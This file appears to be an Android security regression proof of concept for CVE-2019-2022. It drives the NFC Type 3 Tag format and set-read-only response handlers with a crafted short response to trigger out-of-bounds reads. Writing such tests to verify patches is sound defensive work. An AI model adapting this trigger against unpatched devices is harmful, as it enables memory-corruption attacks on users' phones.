securityPatch/CVE-2019-2022/poc.cpp

/*
 * Copyright (C) 2021 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <stdlib.h>
#include <string.h>
#include <nfc_int.h>
#include <nfc_api.h>
#include <tags_defs.h>
#include <rw_int.h>

#define T3T_MSG_FELICALITE_MC_OFFSET 0x01

extern tRW_CB rw_cb;
extern tNFC_CB nfc_cb;
tNFC_CONN *p_data;
void rw_init(void);
tNFC_STATUS rw_t3t_select(uint8_t peer_nfcid2[NCI_RF_F_UID_LEN],
        uint8_t mrti_check, uint8_t mrti_update);

void *allocate_memory(size_t size) {
    void *ptr = malloc(size);
    memset(ptr, 0x0, size);
    return ptr;
}

/* States */
enum {
    RW_T3T_STATE_NOT_ACTIVATED,
    RW_T3T_STATE_IDLE,
    RW_T3T_STATE_COMMAND_PENDING
};

/* Enumeration of API commands */
enum {
    RW_T3T_CMD_DETECT_NDEF,
    RW_T3T_CMD_CHECK_NDEF,
    RW_T3T_CMD_UPDATE_NDEF,
    RW_T3T_CMD_CHECK,
    RW_T3T_CMD_UPDATE,
    RW_T3T_CMD_SEND_RAW_FRAME,
    RW_T3T_CMD_GET_SYSTEM_CODES,
    RW_T3T_CMD_FORMAT,
    RW_T3T_CMD_SET_READ_ONLY_SOFT,
    RW_T3T_CMD_SET_READ_ONLY_HARD,
    RW_T3T_CMD_MAX
};

/* Sub-states */
enum {
    /* Sub states for formatting Felica-Lite */
    RW_T3T_FMT_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for
     formatting) */
    RW_T3T_FMT_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
     block-read to complete */
    RW_T3T_FMT_SST_UPDATE_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
     block-write to complete */
    RW_T3T_FMT_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write
     to complete */

    /* Sub states for setting Felica-Lite read only */
    RW_T3T_SRO_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for
     setting read only) */
    RW_T3T_SRO_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write
     to complete */
    RW_T3T_SRO_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
     block-read to complete */
    RW_T3T_SRO_SST_UPDATE_MC_BLK /* Waiting for Felica-Lite MC (MemoryControl)
     block-write to complete */
};

void poc_cback(tRW_EVENT event, tRW_DATA* p_rw_data) {
    (void)event;
    (void)p_rw_data;
}

void GKI_start_timer(uint8_t, int32_t, bool) {
}

void GKI_stop_timer(uint8_t) {
}

void GKI_freebuf(void*) {
}

int trigger_OOB_via_rw_t3t_act_handle_fmt_rsp(){
    tRW_T3T_CB* p_t3t = &rw_cb.tcb.t3t;

    GKI_init();
    rw_init();
    rw_cb.p_cback = &poc_cback;

    uint8_t peer_nfcid2[NCI_RF_F_UID_LEN];
    uint8_t mrti_check = 1, mrti_update = 1;
    if (rw_t3t_select(peer_nfcid2, mrti_check, mrti_update) != NFC_STATUS_OK) {
        return EXIT_FAILURE;
    }

    p_data = (tNFC_CONN *) allocate_memory(sizeof(tNFC_CONN));
    if (!p_data) {
        return EXIT_FAILURE;
    }
    p_data->data.p_data = (NFC_HDR *) allocate_memory(sizeof(NFC_HDR) * 4);
    if (!(p_data->data.p_data)) {
        free(p_data);
        return EXIT_FAILURE;
    }
    p_data->status = NFC_STATUS_OK;

    p_t3t->cur_cmd = RW_T3T_CMD_FORMAT;
    p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
    p_t3t->rw_substate = RW_T3T_FMT_SST_CHECK_MC_BLK;

    NFC_HDR* p_msg = (p_data->data).p_data;
    p_msg->len = T3T_MSG_RSP_COMMON_HDR_LEN;

    uint8_t* p_t3t_rsp = (uint8_t*) (p_msg + 1) + (p_msg->offset + 1);
    p_t3t_rsp[T3T_MSG_RSP_OFFSET_RSPCODE] = T3T_MSG_OPC_CHECK_RSP;
    p_t3t_rsp[T3T_MSG_RSP_OFFSET_STATUS1] = T3T_MSG_RSP_STATUS_OK;

    uint8_t* p_mc = &p_t3t_rsp[T3T_MSG_RSP_OFFSET_CHECK_DATA];
    p_mc[T3T_MSG_FELICALITE_MC_OFFSET_SYS_OP] = !T3T_MSG_FELICALITE_MC_OFFSET;

    tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
    tNFC_CONN_EVT event = NFC_DATA_CEVT;
    memcpy(p_t3t->peer_nfcid2, &p_t3t_rsp[T3T_MSG_RSP_OFFSET_IDM],
           NCI_NFCID2_LEN);
    p_cb->p_cback(0, event, p_data);
    free(p_data->data.p_data);
    free(p_data);
    return EXIT_SUCCESS;
}

int trigger_OOB_via_rw_t3t_act_handle_sro_rsp(){
    tRW_T3T_CB* p_t3t = &rw_cb.tcb.t3t;

    GKI_init();
    rw_init();
    rw_cb.p_cback = &poc_cback;

    uint8_t peer_nfcid2[NCI_RF_F_UID_LEN];
    uint8_t mrti_check = 1, mrti_update = 1;
    if (rw_t3t_select(peer_nfcid2, mrti_check, mrti_update) != NFC_STATUS_OK) {
        return EXIT_FAILURE;
    }

    tNFC_CONN *p_data = (tNFC_CONN *) allocate_memory(sizeof(tNFC_CONN));
    if (!p_data) {
        return EXIT_FAILURE;
    }
    p_data->data.p_data = (NFC_HDR *) allocate_memory(sizeof(NFC_HDR) * 4);
    if (!(p_data->data.p_data)) {
        free(p_data);
        return EXIT_FAILURE;
    }
    p_data->status = NFC_STATUS_OK;

    p_t3t->cur_cmd = RW_T3T_CMD_SET_READ_ONLY_HARD;
    p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
    p_t3t->rw_substate = RW_T3T_SRO_SST_CHECK_MC_BLK;

    NFC_HDR* p_msg = (p_data->data).p_data;
    p_msg->len = T3T_MSG_RSP_COMMON_HDR_LEN;

    uint8_t* p_t3t_rsp = (uint8_t*) (p_msg + 1) + (p_msg->offset + 1);
    p_t3t_rsp[T3T_MSG_RSP_OFFSET_RSPCODE] = T3T_MSG_OPC_CHECK_RSP;
    p_t3t_rsp[T3T_MSG_RSP_OFFSET_STATUS1] = T3T_MSG_RSP_STATUS_OK;

    uint8_t* p_mc = &p_t3t_rsp[T3T_MSG_RSP_OFFSET_CHECK_DATA];
    p_mc[T3T_MSG_FELICALITE_MC_OFFSET_SYS_OP] = T3T_MSG_FELICALITE_MC_OFFSET;

    tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
    tNFC_CONN_EVT event = NFC_DATA_CEVT;

    p_cb->p_cback(0, event, p_data);
    free(p_data->data.p_data);
    free(p_data);
    return EXIT_SUCCESS;
}

int main() {
   int ret = trigger_OOB_via_rw_t3t_act_handle_fmt_rsp();
   ret |= trigger_OOB_via_rw_t3t_act_handle_sro_rsp();
   return ret;
}